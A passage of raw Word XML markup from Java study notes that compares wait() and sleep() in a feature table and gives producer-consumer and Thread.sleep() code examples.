          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> No, when a thread calls sleep(), it </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>does not release any locks</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> it holds. The thread is simply paused for the specified time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467B8F7C" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1112"/>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State:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The thread enters the "timed waiting" state and remains paused for the specified amount of time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3C6DF4" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1112"/>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Can be Interrupted:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Yes, a thread sleeping via sleep() can be interrupted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6252DE50" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1112"/>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Example Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20279781" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:ind w:left="720"/>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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EBEDAE" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:ind w:left="720"/>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Thread.sleep(1000);  // Pauses the current thread for 1 second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0A006E" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:ind w:left="720"/>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catch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BF5C18" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:ind w:left="720"/>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e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3CE048" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:ind w:left="720"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137502A6" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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3"/>
        <w:gridCol w:w="3798"/>
        <w:gridCol w:w="4373"/>
      </w:tblGrid>
      <w:tr w:rsidR="004E218C" w:rsidRPr="004E218C" w14:paraId="0789063E" w14:textId="77777777" w:rsidTr="00584C4B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AF361A4" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E218C">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35F5810F" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E218C">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>wait()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2664E3EF" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E218C">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>sleep()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E218C" w:rsidRPr="004E218C" w14:paraId="7420476E" w14:textId="77777777" w:rsidTr="00584C4B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EC137C4"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Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4585195E"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Belongs to the Object class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E2B09B6"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Belongs to the Thread class</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E218C" w:rsidRPr="004E218C" w14:paraId="54F9D655" w14:textId="77777777" w:rsidTr="00584C4B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15614FA2"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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5138B951"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Used for inter-thread communication (waiting for a signal)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="082A2C80"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Pauses the execution of the current thread for a specified period</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E218C" w:rsidRPr="004E218C" w14:paraId="10CC4E2A" w14:textId="77777777" w:rsidTr="00584C4B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FA05EB0"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Lock Release</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="165D3751"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Releases the lock when waiting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="111FECCE"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Does not release the lock</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E218C" w:rsidRPr="004E218C" w14:paraId="6F60BF6B" w14:textId="77777777" w:rsidTr="00584C4B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08DF64FF"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Synchronization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D3245E7"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Must be called from a synchronized block/method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CB0A2C3"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Can be called from anywhere (no synchronization required)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E218C" w:rsidRPr="004E218C" w14:paraId="03831B89" w14:textId="77777777" w:rsidTr="00584C4B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D9C6EFE"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State</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="255B01AF"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Puts the thread in the "waiting" state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F5C5058"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Puts the thread in the "timed waiting" state</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E218C" w:rsidRPr="004E218C" w14:paraId="5F92032E" w14:textId="77777777" w:rsidTr="00584C4B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57C408E5"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InterruptedException</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="169626E4"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Can throw InterruptedException when interrupted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="195EA94F"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Can throw InterruptedException when interrupted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E218C" w:rsidRPr="004E218C" w14:paraId="7B944D08" w14:textId="77777777" w:rsidTr="00584C4B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F90E07C"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Notification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74010103"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Requires another thread to call notify()/notifyAll() to resume execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6590B59E"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No need for notification to resume execution (resumes automatically after sleep time)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="035C158F" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>When to Use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB3C6EB" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1113"/>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wait()</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use when you need to coordinate or synchronize the behavior of threads, such as waiting for a condition to be met or waiting for a resource to become available. It's useful in producer-consumer scenarios or implementing a condition variable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E31982" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1113"/>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sleep()</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use when you simply need to pause the execution of a thread for a certain period, such as adding a delay or simulating some processing time. It's generally used for controlling thread execution timing, such as polling or throttling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10567F0C" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6154BBA2" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1114"/>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Using wait() and notify() in a Producer-Consumer Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAF329C" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1114"/>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A </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>producer</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> thread produces items and adds them to a buffer, while a </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> thread consumes them. The consumer waits if the buffer is empty, and the producer waits if the buffer is full.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E354EB4"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class Buffer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E194CE5"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private int item;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA7D0A0"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private boolean isEmpty = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFB3F06" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24ADAC29"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public synchronized void produce(int item) throws InterruptedException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B278B6"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while (!isEmpty) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACDB377"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wait();  // Wait if the buffer is not empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606A8B6F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72740BCB"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this.item = item;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F56F38"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isEmpty = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB89694"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notify();  // Notify consumer that the item is produced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06758070"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CD05E7" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2868581E"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public synchronized int consume() throws InterruptedException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460951A3"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while (isEmpty) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8DB2C7"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wait();  // Wait if the buffer is empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1070F5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACA39CE"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isEmpty = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B183C4D"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notify();  // Notify producer that the buffer is empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCE0CBF"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return item;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACBCCC2"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277B125C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377C0BD8" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1114"/>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Using sleep() to Simulate Delays in Thread Execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDF2EB1"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class Worker extends Thread {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090F123F"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public void run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223BBB7A"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689400D3"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Thread.sleep(2000);  // Sleep for 2 seconds before doing work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F07FC3"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System.out.println("Task done after sleep!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75621EE6"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 catch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50484D32"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e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C669E2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D8BA19"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5368375C" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6020A767" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In conclusion, </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wait()</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used for inter-thread communication where one thread needs to wait for another to notify it, while </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sleep()</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used to pause a thread for a fixed period, without releasing the lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F7C6B3" w14:textId="75B8A8F2" w:rsidR="00BD73D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00BD73D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9CB423B">
          <v:rect id="_x0000_i1824" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3AFA55" w14:textId="07A34155" w:rsidR="00C836C6" w:rsidRPr="00CE4B95" w:rsidRDefault="00245DE6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
